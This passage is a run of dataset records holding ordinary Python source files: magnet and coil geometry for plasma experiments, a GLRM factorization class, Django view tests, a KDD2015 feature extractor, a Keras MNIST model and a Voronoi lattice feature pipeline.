distributed_spec=None\r\n# )\r\n\r\n# Train for 300 episodes\r\nfor _ in range(300):\r\n\r\n # Initialize episode\r\n states = environment.reset()\r\n terminal = False\r\n\r\n while not terminal:\r\n # Episode timestep\r\n actions = agent.act(states=states)\r\n states, terminal, reward = environment.execute(actions=actions)\r\n agent.observe(terminal=terminal, reward=reward)\r\n\r\nagent.close()\r\nenvironment.close()\r\n","sub_path":"Tensorforce/tf_main.py","file_name":"tf_main.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"77788996","text":"import numpy as np\nimport os\nimport warnings\nfrom matplotlib.patches import Polygon, Wedge\nfrom matplotlib.collections import PatchCollection\nimport matplotlib as mpl\n\nfrom pleiades import (Current, CurrentGroup, Magnet, Component, ZSymmCoilSet,\n MagnetGroup, CurrentArray, Configuration)\n\nclass TREXcoil(CurrentGroup):\n def __init__(self,**kwargs):\n z0 = float(kwargs.pop(\"z0\",0))\n self._z0 = z0\n Rarr = 2.00467 + np.linspace(0, .067083, 6)\n Zarr = np.linspace(-.105469,.105469, 16)\n rz_pts = []\n for i, r in enumerate(Rarr):\n if i == 5:\n rz_pts.extend([(r, z0 + z) for z in (Zarr[0::2]+Zarr[1::2])/2])\n else:\n rz_pts.extend([(r, z0 + z) for z in Zarr])\n# for i, z in enumerate(Zarr):\n# if np.mod(i, 2) == 0:\n# rz_pts.extend([(r, z0 + z) for r in Rarr])\n# else:\n# rz_pts.extend([(r, z0 + z) for r in Rarr[0:5]])\n rz_pts = np.array(rz_pts)\n super_kwargs = {\"rz_pts\":rz_pts,\"patchcls\":Polygon,\"fc\":\".35\",\"ec\":\"k\"}\n super_kwargs.update(kwargs)\n super(TREXcoil,self).__init__(**super_kwargs)\n\n @property\n def z0(self):\n return self._z0\n\n @z0.setter\n def z0(self,new_z0):\n dz = new_z0 - self._z0\n super(TREXcoil,self).translate((0,dz))\n self._z0 = new_z0\n\n def build_patchargs(self,**kwargs):\n z0 = self._z0\n left,right = 2.00467, 2.00467 + .067083\n bottom, top = z0 - .105469, z0 + .105469\n return (np.array([[left,bottom],[left,top],[right,top],[right,bottom]]),)\n\nclass TREXCoils(Component):\n def __init__(self,**kwargs):\n ###### Build TREX coils\n super(TREXCoils,self).__init__()\n z0 = float(kwargs.pop(\"z0\",1.1757))\n labels = kwargs.pop(\"labels\",[\"Ncoil\",\"Scoil\"])\n currents = np.array(kwargs.pop(\"currents\",(1,1)),dtype=\"float\")\n nprocs = kwargs.pop(\"nprocs\",[4,4])\n patch_mask = kwargs.pop(\"patch_mask\",[0,0])\n grid = kwargs.pop(\"grid\",None)\n Scoil = TREXcoil(z0=-z0,**kwargs)\n Ncoil = TREXcoil(z0=z0,**kwargs)\n self.groups = [Ncoil,Scoil]\n self.labels = labels\n self.currents = currents\n self.nprocs = nprocs\n self.patch_mask = [0,0]\n\nclass LTRXCoils(ZSymmCoilSet):\n def __init__(self,**kwargs):\n dr,dz = 0.010583333,0.01031667\n nr,nz = 10,13\n r0,z0 = 0.185725,1.6367\n super_kwargs = {\"r0\":r0,\"z0\":z0,\"dr\":dr,\"dz\":dz,\"labels\":[\"Scoil\",\"Ncoil\"],\n \"patchcls\":Polygon,\"fc\":\".35\",\"ec\":\"k\"}\n super_kwargs.update(kwargs)\n super(LTRXCoils,self).__init__(**super_kwargs)\n\nclass VesselMagnets(Component):\n def __init__(self,**kwargs):\n super(VesselMagnets,self).__init__()\n labels = kwargs.pop(\"labels\",[\"Npole\",\"bulk\",\"Spole\"])\n nprocs = kwargs.pop(\"nprocs\",[1,12,1])\n currents = kwargs.pop(\"currents\",[2710.68,2710.68,2710.68])\n patch_mask = kwargs.pop(\"patch_mask\",[0,0,0])\n height = 1 * .0254\n width = 1.5 * .0254\n # first group\n z = 1.5117\n r = .0768\n kwargs.update({\"fc\":\"b\"})\n m1 = 
MagnetGroup(rz_pts=[(r,z)],mu_hats=[0],height=height,width=width,**kwargs)\n # second group\n R = 1.514475\n Theta = np.linspace(7.5, 172.5, 34)\n rpts,zpts = R*np.sin(np.deg2rad(Theta)),R*np.cos(np.deg2rad(Theta))\n rz_pts = np.vstack((rpts,zpts)).T\n mu_hats = Theta + np.mod(np.arange(1, 35), 2) * 180\n m2 = MagnetGroup(rz_pts=rz_pts,mu_hats=mu_hats,height=height,width=width,**kwargs)\n for m_obj in m2.obj_list[::2]:\n m_obj.patchkwargs[\"fc\"]=\"r\"\n # third group\n z = -1.5117\n r = .0768\n kwargs.update({\"fc\":\"r\"})\n m3 = MagnetGroup(rz_pts=[(r,z)],mu_hats=[0],height=height,width=width,**kwargs)\n self.groups = [m1,m2,m3]\n self.labels = labels\n self.nprocs = nprocs\n self.patch_mask = patch_mask\n self.currents = currents\n self.update_patches()\n\n @Component.patches.getter\n def patches(self):\n plist = [group.patches for group,mask in zip(self._groups,self._patch_mask) if not mask]\n return [p for sublist in plist for p in sublist]\n\nclass Dipole(Component):\n \"\"\"Internal dipole Magnet comprised of 2 cylindrical SmCo magnets.\n\n Attributes:\n magnets (list): list of Magnet objects comprising this instance\n patches (list of matplotlib.patches.Polygon instances): patches representing the vessel magnets\n \"\"\"\n\n def __init__(self, **kwargs):\n super(Dipole,self).__init__()\n r0,z0 = kwargs.pop(\"loc\",(0,0))\n muhat = kwargs.pop(\"muhat\",0)\n labels = kwargs.pop(\"labels\",[\"dipole\"])\n nprocs = kwargs.pop(\"nprocs\",[1])\n currents = kwargs.pop(\"currents\",[2901.0])\n patch_mask = kwargs.pop(\"patch_mask\",[0])\n # Build internal dipole magnets\n width = (2.75 / 2 - .125) * .0254\n height = 2.5 / 2 * .0254\n delta = (1.25 / 2 + .125) * .0254\n r1 = r0 + .125 * .0254 + width / 2.0 # + delta*np.sin(np.pi*mu_hat/180.0)\n r2 = r1 # rho0 - delta*np.sin(np.pi*mu_hat/180.0)\n z1 = z0 + delta # *np.cos(np.pi*mu_hat/180.0)\n z2 = z0 - delta # *np.cos(np.pi*mu_hat/180.0)\n m1 = MagnetGroup(rz_pts=[(r1,z1),(r2,z2)],mu_hats=[muhat,muhat],height=height,width=width,current=currents[0],**kwargs)\n self.groups = [m1]\n self.labels = labels\n self.nprocs = nprocs\n self.patch_mask = patch_mask\n self.currents = currents\n self.update_patches()\n \n @Component.patches.getter\n def patches(self):\n plist = [group.patches for group,mask in zip(self._groups,self._patch_mask) if not mask]\n return [p for sublist in plist for p in sublist]\n\nclass BRB(Configuration):\n def __init__(self,**kwargs):\n super(BRB,self).__init__()\n self.add_component(TREXCoils(),\"trex\")\n self.add_component(LTRXCoils(),\"ltrx\")\n self.add_component(VesselMagnets(),\"vessel_mags\")\n self.grid = kwargs.pop(\"grid\",None)\n self.artists = [Wedge((0,0),1.556,0,360,width=.032,fc=\".35\",ec=\"k\",zorder=100)]\n\n def add_cathode(self):\n raise NotImplementedError(\"Can't add cathodes to BRB yet\")\n\n def add_anode(self):\n raise NotImplementedError(\"Can't add anode to BRB yet\")\n\n def add_sweep(self,center,r,theta1,theta2,width=None,**kwargs):\n self.patches.append(Wedge(center,r,theta1,theta2,width=width,**kwargs))\n\nclass LTRX(Configuration):\n def __init__(self,**kwargs):\n super(LTRX,self).__init__()\n zc = 2.811\n self.add_component(CoilPack(r0=.286,z0=1.173-zc,nr=16,nz=16,dr=0.0135,dz=0.0135,fc=\".35\",ec=\"k\"),\"coil_1\")\n for i in range(2,8):\n z_i = 1.173+.278 + (i-2)*.214 - zc\n coil_i = CoilPack(r0=.381,z0=z_i,nr=12,nz=8,dr=0.0127,dz=0.0127,fc=\".35\",ec=\"k\")\n self.add_component(coil_i,\"coil_{0}\".format(i))\n 
self.add_component(CoilPack(r0=.286,z0=2.811-zc,nr=16,nz=16,dr=0.0135,dz=0.0135,fc=\".35\",ec=\"k\"),\"coil_8\")\n# self.add_component(CoilPack(r0=.53,z0=3.3,nr=3,nz=6,dr=0.01,dz=0.01,fc=\".35\",ec=\"k\"),\"coil_9\")\n# self.add_component(CoilPack(r0=.53,z0=5.3,nr=3,nz=6,dr=0.01,dz=0.01,fc=\".35\",ec=\"k\"),\"coil_10\")\n\n self.grid = kwargs.pop(\"grid\",None)\n\n\n\nclass PCX_HH(object):\n \"\"\"PCX Helmholtz coil set\n\n Attributes:\n t_current (double): current through top HH coil\n b_current (double): current through bottom HH coil\n fc (str): facecolor for patch\n top_coil (CurrentArray): CurrentArray object for top coil\n bot_coil (CurrentArray): CurrentArray object for bottom coil\n current_objs (list): list of Current objects comprising this instance\n patches (list of matplotlib.patches.Polygon instances): patches representing the PCX HH coils\n \"\"\"\n\n def __init__(self, t_current, b_current, fc='0.35'):\n ## Build PCX HH coils\n N=89. #number of windings (guess...)\n self.t_current = t_current * N\n self.b_current = b_current * N\n self.fc = fc\n R = 75.8825/100.\n ztop = 38.03142/100.\n zbot = -37.85616/100.\n w = 10.795/100.\n h = 10.16/100.\n self.top_coil = Current((R, ztop), self.t_current, frame=\"rhoz\", units=\"m\")\n self.bot_coil = Current((R, zbot), self.b_current, frame=\"rhoz\", units=\"m\")\n self.current_objs = [self.top_coil, self.bot_coil]\n top_coil_patch = Polygon([(R-w/2.,ztop-h/2.),(R-w/2., ztop+h/2.), (R+w/2., ztop+h/2.), (R+w/2., ztop-h/2.)],\n closed=True, fc=self.fc, ec='k')\n bot_coil_patch = Polygon([(R-w/2.,zbot-h/2.),(R-w/2., zbot+h/2.), (R+w/2., zbot+h/2.), (R+w/2., zbot-h/2.)],\n closed=True, fc=self.fc, ec='k')\n self.patches = [top_coil_patch, bot_coil_patch]\n\n def get_current_objs(self):\n return self.current_objs\n\n def get_current_tuples(self, frame='rhoz', units='m'):\n assert frame.lower() in ['polar', 'rhoz'], \"Invalid frame choice: {0}\".format(frame)\n assert units.lower() in ['m', 'cm'], \"Invalid units choice: {0}\".format(units)\n return [c_obj.get_current_tuples(frame=frame, units=units)[0] for c_obj in self.current_objs]\n\n\nclass PCX_magCage(object):\n \"\"\"Represent an array of dipole magnets that comprise the PCX magnet cage.\n\n Attributes:\n magnets (list): list of Magnet objects comprising this instance\n patches (list of matplotlib.patches.Polygon instances): patches representing the cage magnets\n \"\"\"\n\n def __init__(self, current_mags=None):\n ### Build the magnet array ###\n height = 1.905 # cm\n width = 1.905 # cm\n # all positions relative to origin of the vessel, ref: gdrive sheet\n # [TS1,TS2,TS3,TS4,TS5,TS6,TS7,TS8,TA,S14,S13,S12,S11,S10,S9,S8,S7,\n # S6,S5,S4,S3,S2,S1,BA,BS8,BS7,BS6,BS5,BS4,BS3,BS2,BS1]\n R = np.array([4.1275, 9.8425, 15.5575, 21.2725, 26.9875, 32.7025, 38.4175, 44.1325, 46.6598, 46.25975, 46.25975,\n 46.25975,46.25975, 46.25975, 46.25975, 46.25975, 46.25975, 46.25975, 46.25975, 46.25975, 46.25975,\n 46.25975,46.25975, 46.6598, 44.1325, 38.4175, 32.7025, 26.9875, 21.2725, 15.5575, 9.8425, 4.1275])\n Z = np.array([50.2335, 50.2335, 50.2335, 50.2335, 50.2335, 50.2335, 50.2335, 50.2335,49.0512,46.2645,40.0959,\n 33.9273,27.7587,21.5901,15.4215,9.2529,3.0843,-3.0843,-9.2529,-15.4215,-21.5901,-27.7587,-33.9273,\n -36.7139,-37.8965,-37.8965,-37.8965,-37.8965,-37.8965,-37.8965,-37.8965,-37.8965])\n muHats = np.array([180.,0.,180.,0.,180.,0.,180.,0.,135.,270.,90.,270.,90.,270.,90.,270.,90.,270.,90.,270.,90.,270.,\n 90.,225.,0.,180.,0.,180.,0.,180.,0.,180.])\n if current_mags == None:\n 
current_mags = np.ones(10)\n n = len(current_mags) / (height / 100.0)\n ## MPDX strengths\n current_mags *= .4 / (4 * np.pi * 10 ** -7 * n)\n current_mags *= 3.3527\n self.magnets = []\n self.patches = []\n for i, (r, z, h) in enumerate(zip(R, Z, muHats)):\n if np.mod(i,2):\n fc = \"b\"\n else:\n fc = \"r\"\n m = Magnet((r, z), current_mags=current_mags, width=width, height=height, frame='rhoz', units=\"cm\",\n mu_hat=h, fc= fc)\n self.magnets.append(m)\n self.patches.append(m.patch)\n\n def set_strength(self, current_mags):\n \"\"\"Set strength of each magnet with 1D array current_mags\"\"\"\n for m in self.magnets:\n m.set_currents(current_mags)\n\n def get_current_tuples(self, frame='rhoz', units='m'):\n \"\"\"Return computationally relevant info: list of (rho, z, current) tuples for instance.\"\"\"\n assert frame.lower() in [\"polar\", \"rhoz\"], \"Invalid frame choice: {0}\".format(frame)\n assert units.lower() in [\"m\", \"cm\"], \"Invalid units choice: {0}\".format(units)\n return [c_obj.get_current_tuples(frame=frame, units=units)[0] for c_obj in self.magnets]\n\n def set_magnets(self, current_mags):\n self.magnets = []\n self.patches = []\n self.current_mags = current_mags\n for i, (r, zz, h) in enumerate(zip(self.r, self.z, self.muHats)):\n if np.mod(i, 2):\n fc = \"r\"\n else:\n fc = \"b\"\n m = Magnet((r, zz), current_mags=current_mags, width=width, height=height, frame='rhoz',\n units='cm', mu_hat=h, fc=fc)\n self.magnets.append(m)\n self.patches.append(m.patch)\n\n def set_strength(self, current_mags):\n \"\"\"Set strength of each magnet with 1D array current_mags\"\"\"\n self.current_mags = current_mags\n for m in self.magnets:\n m.set_currents(current_mags)\n\n\nclass PhilipsMRI(object):\n def __init__(self, loc, current):\n rho0, z0 = loc\n delta_rho = .01\n delta_z = .01\n nz = 1.5 // delta_z\n nrho = .05 // delta_rho\n z1 = nz / 2 * delta_z\n ## dimensions of cryostats\n inner_r = .930 / 2.0\n outer_r = 1.88 / 2.0\n length = 1.618\n verts = np.array([[inner_r,z0+length/2.0],[outer_r,z0+length/2.0],[outer_r,z0-length/2.0],[inner_r,z0-length/2.0]])\n self.cryo = Polygon(verts,closed=True,fc=\"None\",ec=\"k\",lw=2,joinstyle=\"round\")\n self.coil = CurrentArray((rho0,z0-z1),nrho,nz,delta_rho,delta_z,current,fc=\".45\",units=\"m\")\n self.patches = [self.cryo,self.coil.patch]\n\n def get_current_tuples(self,frame=\"rhoz\",units=\"m\"):\n return self.coil.get_current_tuples(frame=frame,units=units)\n\n\ndef build_pcx(vessel=True, HH=(False, 0, 0)):\n \"\"\"\"Return field objects and patches representing PCX (modified copy of\n build_wipal).\n\n Parameters\n ----------\n vessel : bool\n Boolean to include vessel magnets or not, default True\n HH : tuple\n Tuple of (bool,float,float) representing whether or not to include\n helmholtz coil set and, if so, how much current goes into the upper and\n lower coil, respectively default (False,0,0)\n \"\"\"\n patches = []\n current_objs = []\n if vessel:\n vessel_magnets = PCX_magCage()\n current_objs.extend(vessel_magnets.magnets)\n patches += vessel_magnets.patches\n if HH[0]:\n top_current = HH[1]\n bot_current = HH[2]\n hh_coils = PCX_HH(top_current, bot_current)\n current_objs.extend(hh_coils.get_current_objs())\n patches.extend(hh_coils.patches)\n return current_objs, patches\n\ndef build_gdt():\n rho0 = 40\n n_rho = 20\n n_z = 100\n delta_rho = 1\n delta_z = 1\n coil_1 = CurrentArray((rho0, -325), n_rho, n_z, delta_rho, delta_z, 1500, units=\"cm\")\n coil_2 = CurrentArray((rho0, -215), n_rho, n_z, delta_rho, delta_z, 500, 
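# --- Illustrative sketch (added; not part of the original dataset records) ---
# The scaling above models each permanent magnet as a stack of current loops:
# a remanent field B_r corresponds to a surface current density K = B_r/mu0,
# so each of the n loops per metre carries I = B_r / (mu0 * n). B_r = 0.4 T is
# the 0.4 in the record; the record's additional 3.3527 factor is an empirical
# tweak and is left out here. The loop count below is a placeholder.
import numpy as np

mu0 = 4 * np.pi * 1e-7            # vacuum permeability, T*m/A
B_r = 0.4                         # remanent field, T
height_m = 1.905e-2               # magnet height, m (1.905 cm as in the record)
n_loops = 10                      # loops discretizing one magnet (placeholder)
I_loop = B_r / (mu0 * (n_loops / height_m))
print(f"{I_loop:.1f} A per loop")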
units=\"cm\")\n coil_3 = CurrentArray((rho0, -105), n_rho, n_z, delta_rho, delta_z, 500, units=\"cm\")\n coil_4 = CurrentArray((rho0, 5), n_rho, n_z, delta_rho, delta_z, 500, units=\"cm\")\n coil_5 = CurrentArray((rho0, 115), n_rho, n_z, delta_rho, delta_z, 500, units=\"cm\")\n coil_6 = CurrentArray((rho0, 225), n_rho, n_z, delta_rho, delta_z, 1500, units=\"cm\")\n coil_7 = CurrentArray((rho0 / 2.0, -395), 10, 50, delta_rho, delta_z, 30000, units=\"cm\")\n coil_8 = CurrentArray((rho0 / 2.0, 345), 10, 50, delta_rho, delta_z, 30000, units=\"cm\")\n current_objs = [coil_1, coil_2, coil_3, coil_4, coil_5, coil_6, coil_7, coil_8]\n patches = [coil_1.patch, coil_2.patch, coil_3.patch, coil_4.patch, coil_5.patch, coil_6.patch, coil_7.patch,\n coil_8.patch]\n\n return current_objs, patches\n","sub_path":"pleiades/wipplsystems.py","file_name":"wipplsystems.py","file_ext":"py","file_size_in_byte":15856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206700785","text":"import cvxpy as cp\nimport numpy as np\nfrom .util import missing2mask\nfrom .convergence import *\nimport sys\n\n\nclass GLRM:\n def __init__(\n self, A, loss_list, k, regX=None, regY=None, missing_list=None, scale=True\n ):\n self.scale = scale\n self.k = k\n self.A = A\n self.loss_list = loss_list\n self.missing_list = missing_list\n self.regX = regX\n self.regY = regY\n self.converged = Convergence()\n self.vals = []\n self.niter = 0\n if missing_list is not None:\n self.mask = missing2mask(A.shape, missing_list)\n else:\n self.mask = np.ones_like(A, dtype=np.bool)\n if self.scale:\n self.calc_scaling()\n else:\n self.mu = ones(A.shape[1])\n self.sigma = ones(A.shape[1])\n self._initialize_probs()\n\n def calc_scaling(self):\n self.mu = np.zeros(self.A.shape[1])\n self.sigma = np.zeros(self.A.shape[1])\n for columns, loss_fxn in self.loss_list:\n for col in columns:\n elems = self.A[:, col][self.mask[:, col]]\n alpha = cp.Variable()\n prob = cp.Problem(cp.Minimize(loss_fxn(elems, alpha)))\n self.sigma[col] = prob.solve() / len(\n elems\n ) # len(elems)-1 per the paper?\n self.mu[col] = alpha.value\n\n def _initialize_probs(self):\n m = self.A.shape[0]\n n = self.A.shape[1]\n\n self.Xp = cp.Parameter((m, self.k))\n self.Xv = cp.Variable((m, self.k))\n\n self.Yp = cp.Parameter((self.k, n))\n self.Yv = cp.Variable((self.k, n))\n\n # Random Intialization\n self.Xv.value = np.random.rand(m, self.k)\n self.Xp.value = np.random.rand(m, self.k)\n\n self.Yp.value = np.random.rand(self.k, n)\n self.Yv.value = np.random.rand(self.k, n)\n self._initialize_XY()\n self.objX = 0\n self.objY = 0\n Zx = self.Xv @ self.Yp\n Zy = self.Xp @ self.Yv\n for col, loss_fxn in self.loss_list:\n Acol = self.A[:, col][self.mask[:, col]]\n Zxcol = Zx[:, col][self.mask[:, col]]\n Zycol = Zy[:, col][self.mask[:, col]]\n\n # Acol\n # print(col)\n # print((Acol,Zx[:,col]+self.mu[col].shape)\n self.objX += loss_fxn(Acol, Zxcol + self.mu[col]) / self.sigma[col]\n self.objY += loss_fxn(Acol, Zycol + self.mu[col]) / self.sigma[col]\n\n if self.regX is not None:\n self.objX += self.regX(self.Xv)\n if self.regY is not None:\n self.objY += self.regY(self.Yv)\n self.probX = cp.Problem(cp.Minimize(self.objX))\n self.probY = cp.Problem(cp.Minimize(self.objY))\n\n def _initialize_XY(self):\n B = (self.A - self.mu) / self.sigma\n B[~self.mask] = 0\n\n U, s, Vh = np.linalg.svd(B, full_matrices=False)\n S = np.diag(s)\n\n X0 = (U @ S)[:, : self.k]\n Y0 = (S @ Vh)[: self.k, :]\n\n self.Xv.value = np.copy(X0)\n 
self.Xp.value = np.copy(X0)\n\n self.Yv.value = np.copy(Y0)\n self.Yp.value = np.copy(Y0)\n\n def fit(self, solver=cp.ECOS, verboseX=False, verboseY=False, verbose=False):\n if verbose:\n verboseX = True\n verboseY = True\n print(\"iter \\t objY\")\n while not self.converged:\n\n self.converged.objX.append(self.probX.solve(solver, verbose=verbose))\n self.Xp.value = np.copy(self.Xv.value)\n\n self.converged.objY.append(self.probY.solve(solver, verbose=verbose))\n self.Yp.value = np.copy(self.Yv.value)\n self.vals.append(self.objY.value)\n sys.stdout.write(\n f\"\\r {self.niter} \\t {np.round(self.converged.objY[-1],2)}\"\n )\n sys.stdout.flush()\n self.niter += 1\n\n return self.Xp.value, self.Yp.value\n\n def predict(self):\n return (self.Xp @ self.Yp).value + self.mu\n\n def plot_convergence(self, **kwargs):\n self.converged.plot(**kwargs)\n","sub_path":"glrm/glrm.py","file_name":"glrm.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"32657297","text":"from django.test import TestCase\n\n\nclass MyTest(TestCase):\n\n def test_loading_index(self):\n response = self.client.get('/', follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed('index.html')\n \n def test_loading_about_us(self):\n response = self.client.get('/about_us/', follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed('about.html')\n","sub_path":"home/tests_views.py","file_name":"tests_views.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"465379608","text":"import numpy as np\nfrom csv import *\nfrom pandas import *\n\n########store id and label into label[id,label]#######################################\n \nwith open('truth_train.csv') as trf:\n label = dict(reader(trf));\n\n################## pandas #############################################################\n\ntrainset = open('kddtrain_v3.csv', 'w');\ntrainset.write(\"enrollment_id,ndate,study_days,label\\n\");\n\ndf = read_csv('new_log_train.csv')\nidx_dict = df['enrollment_id'].value_counts().to_dict()\n\nfor key in idx_dict:\n selt = df[df['enrollment_id']==key]\n event_stat = selt['event'].value_counts().to_dict();\n datedict = selt.date.value_counts().to_dict(); \n datelist = datedict.keys();\n dhour = 0;\n for datekey in datelist:\n perday = df[(df.enrollment_id==key) & (df.date==datekey)];\n delta = max(to_datetime(perday.time)) - min(to_datetime(perday.time));\n dhour = dhour + round(delta/np.timedelta64(1,'D'),3)\n \n ndate = selt['date'].nunique();\n lab = label.get(str(key)); \n trainset.write(str(key)+\",\"+str(ndate)+\",\"+str(dhour)+\",\"+str(lab)+\"\\n\") \n","sub_path":"Kdd2015/Feature_extractor/extractor_v3.py","file_name":"extractor_v3.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"317740097","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2019-08-12 16:32\n@Author : 比尔丶盖子\n@Email : 914138410@qq.com\n\"\"\"\nimport tensorflow as tf\nfrom util.mnist import load_mnist\n\n\"\"\"\nacc = 96.81%\n\"\"\"\ntf.random.set_seed(1)\nmodel = tf.keras.Sequential([tf.keras.layers.Dense(784, activation='relu'),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10, 
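# --- Illustrative sketch (added; not part of the original dataset records) ---
# extractor_v3.py above re-filters the whole frame once per enrollment_id.
# Two groupbys compute the same per-enrollment features (active-day count and
# summed per-day time span) in a single pass; column names follow the record.
import pandas as pd

df = pd.read_csv('new_log_train.csv')
df['time'] = pd.to_datetime(df['time'])

span = (df.groupby(['enrollment_id', 'date'])['time']
          .agg(lambda t: (t.max() - t.min()) / pd.Timedelta(days=1)))
features = pd.DataFrame({
    'ndate': df.groupby('enrollment_id')['date'].nunique(),
    'study_days': span.groupby('enrollment_id').sum().round(3),
})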
activation='softmax')])\nmodel.compile(optimizer=tf.keras.optimizers.Adam(0.001),\n loss=tf.keras.losses.categorical_crossentropy,\n metrics=[tf.keras.metrics.categorical_accuracy])\n\ntrain_image, train_label, test_image, test_label = load_mnist()\n\nmodel.fit(train_image, train_label, epochs=1)\ntest_loss, test_acc = model.evaluate(test_image, test_label)\nprint(test_acc)\n","sub_path":"attempt/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"311976954","text":"from features_extraction import *\r\nfrom build_crystal_lattice import *\r\nfrom scipy.spatial import Voronoi\r\n#import matplotlib.pyplot as plt\r\nfrom Data_save_load import *\r\n\r\ndef q_l6m_tilt_fun(q_l6_m):#input list for 1 paritcle\r\n q_l6_m = np.array(q_l6_m)\r\n s = np.sum(pow(abs(q_l6_m), 2))\r\n q_l6_m_tile = q_l6_m / math.sqrt(s)\r\n return q_l6_m_tile.tolist()\r\n#test\r\n#a=[1,2,3]\r\n#b = q_l6m_tilt_fun(a)\r\n#print(np.array(a) / math.sqrt(14))\r\n\r\n\r\ndef disorder_fun(ref_P_ql6m_tilt, NN_index, particle_index, ql6m_tilt):#list\r\n NN_ql6m = []\r\n ref_P_ql6m_tilt = np.array(ref_P_ql6m_tilt)\r\n ql6m_tilt = np.array(ql6m_tilt)\r\n\r\n for item in NN_index:\r\n NN_ql6m.append(ql6m_tilt[particle_index.index(item)])\r\n\r\n s = 0\r\n for item in NN_ql6m:\r\n s = s + np.dot(ref_P_ql6m_tilt, np.conj(item))\r\n s = s / float(len(NN_index))\r\n return np.around(s, 2)\r\n\r\ndef disorder_filter(particle, cache_NN, cache_ql6m, features): #input complete info list particle [(index, [coordiante]),...], cahce_NN [[indices],...], chace_ql6m[[],...], features [[],...]\r\n ql6m_tilt = [q_l6m_tilt_fun(item) for item in cache_ql6m]\r\n unfilterable_particle = []\r\n filtered_particle = []\r\n filtered_features = []\r\n disorders = []\r\n\r\n index, particle_position = zip(*particle)\r\n for i in range(len(cache_NN)):\r\n if set(cache_NN[i]) < set(index):\r\n s = disorder_fun(cache_ql6m[i], cache_NN[i], index, ql6m_tilt)\r\n filtered_particle.append(particle[i])\r\n filtered_features.append(features[i])\r\n disorders.append(np.around(s, 3))\r\n else:\r\n unfilterable_particle.append([particle[i], features[i]])\r\n\r\n return filtered_particle, filtered_features, disorders, unfilterable_particle # filtered_particle list [(index,[coordinate]),...], filtered_features list[[],...], disorders list [...], unfilterable_particle list [[(index, [coordinate]),[feature]],...]\r\n\r\n\r\ndef pre_processing(crystal_lattice):\r\n particle = []\r\n particle_eliminated = []\r\n features = []\r\n cache_NN_index = []\r\n cache_q_l6_m = []\r\n\r\n lattice_voronoi = Voronoi(crystal_lattice)\r\n\r\n points = lattice_voronoi.points\r\n point_region = lattice_voronoi.point_region\r\n regions = lattice_voronoi.regions\r\n vertices = lattice_voronoi.vertices\r\n ridge_points = lattice_voronoi.ridge_points\r\n ridge_vertices = lattice_voronoi.ridge_vertices\r\n\r\n for i in range(len(points)):\r\n region_index = point_region[i]\r\n cell = regions[region_index]\r\n if -1 in cell:\r\n particle_eliminated.append((i, points[i].tolist()))\r\n else:\r\n particle.append((i, points[i].tolist()))\r\n h_dis, h_angle, q_w, minkowski_eig, NN_count, cache_NN_index_temp, cache_q_l6_m_temp = features_extract(i, ridge_points, ridge_vertices, points, vertices)\r\n feature_temp = output_features(h_dis, h_angle, q_w, minkowski_eig, NN_count)\r\n features.append(feature_temp)\r\n cache_NN_index.append(cache_NN_index_temp)\r\n 
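# --- Illustrative note (added; not part of the original dataset records) ---
# dense.py above compiles with categorical_crossentropy/categorical_accuracy,
# which expect one-hot label vectors. If load_mnist() returned integer class
# ids instead (an assumption -- its contract is not shown here), they would
# need one-hot encoding first, e.g.:
import numpy as np
import tensorflow as tf

int_labels = np.array([3, 1, 4])                                    # stand-in labels
one_hot = tf.keras.utils.to_categorical(int_labels, num_classes=10)
print(one_hot.shape)  # (3, 10)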
cache_q_l6_m.append(cache_q_l6_m_temp)\r\n\r\n filtered_particle, filtered_features, disorders, unfilterable_particle = disorder_filter(particle, cache_NN_index, cache_q_l6_m, features)\r\n return filtered_particle, filtered_features, disorders, unfilterable_particle, particle_eliminated # filtered_particle/eliminated list [(particle_index, particle coordinate)...], filter_features list [[]...], disorders list [],unfilterable_particle list[[(index, coordinate),[feature]],...]\r\n\r\n\r\n#test\r\ncrystal_lattice = crystal_lattice_bcc(5)\r\nfiltered_particle, filtered_features, disorders, unfilterable_particle, particle_eliminated = pre_processing(crystal_lattice)\r\nprint(len(filtered_particle))\r\nprint(len(unfilterable_particle))\r\nprint(len(particle_eliminated))\r\n#inner = [item[1] for item in particle]\r\n#x,y,z = zip(*inner)\r\n#xx,yy,zz = zip(*crystal_lattice)\r\n#fig = plt.figure()\r\n#ax = fig.gca(projection='3d')\r\n#ax.scatter(x,y,z,color='black', marker='o')\r\n#ax.scatter(xx,yy,zz,color='green', marker='*')\r\n#plt.show()\r\n\r\ndata_save(crystal_lattice, filtered_particle, filtered_features, disorders, unfilterable_particle, particle_eliminated)\r\n\r\n","sub_path":"pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
